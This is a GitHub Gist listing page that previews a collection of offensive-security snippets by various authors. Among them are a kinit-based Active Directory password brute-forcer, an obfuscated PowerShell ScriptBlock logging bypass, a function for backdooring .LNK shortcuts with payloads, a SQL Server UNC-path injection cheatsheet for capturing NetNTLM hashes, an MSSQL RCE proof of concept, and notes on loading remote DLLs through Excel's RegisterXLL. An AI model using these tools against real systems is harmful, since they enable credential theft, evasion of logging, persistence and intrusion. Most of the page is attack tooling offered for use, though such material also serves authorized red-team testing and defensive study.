Skip to content

Instantly share code, notes, and snippets.

View curi0usJack's full-sized avatar

curi0usJack

273 followers · 3 following
View GitHub Profile
@karronoli
karronoli / window_test.js
Created April 28, 2012 00:19
ExecuteExcel4Macro test
@if(0)==(0) @echo off & rem -*- Javascript -*-
CScript.exe //NoLogo //E:JScript "%~f0" %*
exit /b 0
@end
var excel = new ActiveXObject("Excel.Application"),
WshShell = WScript.CreateObject("WScript.Shell"),
BIN_DIR = WScript.ScriptFullName.replace(WScript.ScriptName, "");
WINDOW_CLASS = "HTML Application Host Window Class",
//WINDOW_CLASS = "Internet Explorer_Server",
@ccammilleri
ccammilleri / msfconsole.rc
Created February 10, 2016 16:21
set PROMPT %red%L %yel%J %grn%S %blu%W
load nessus
load pentest
load sounds
load alias
alias j "jobs -v"
alias s "sessions -v"
alias -f w "workspace"
alias so "show options"
alias sa "show advanced"
@ropnop
ropnop / kinit_brute.sh
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
@matterpreter
matterpreter / abandonedInprocServer32.cs
Created October 30, 2018 14:01
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active January 28, 2023 20:20
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@3xocyte
3xocyte / create_machine_account.py
Last active February 21, 2023 03:50
simple script for experimenting with machine account creation
#!/usr/bin/env python
import argparse
import sys
import string
import random
# https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain
# create machine account utility by @3xocyte
# with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
@HarmJ0y
HarmJ0y / LNKBackdoor.ps1
Created July 4, 2016 20:49
Functions to 'backdoor' .LNK files with additional functionality and enumerate all 'backdoored' .LNKs on a system.
function Set-LNKBackdoor {
<#
.SYNOPSIS
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
-ScriptBlock or -Command.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
@nullbind
nullbind / SQL Server UNC Path Injection Cheatsheet
Last active December 25, 2023 22:31
SQL Server UNC Path Injection Cheatsheet
This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------
@3xocyte
3xocyte / bad_sequel.py
Last active January 11, 2024 01:42
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@ryhanson
ryhanson / ExcelXLL.md
Last active March 29, 2024 05:27
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc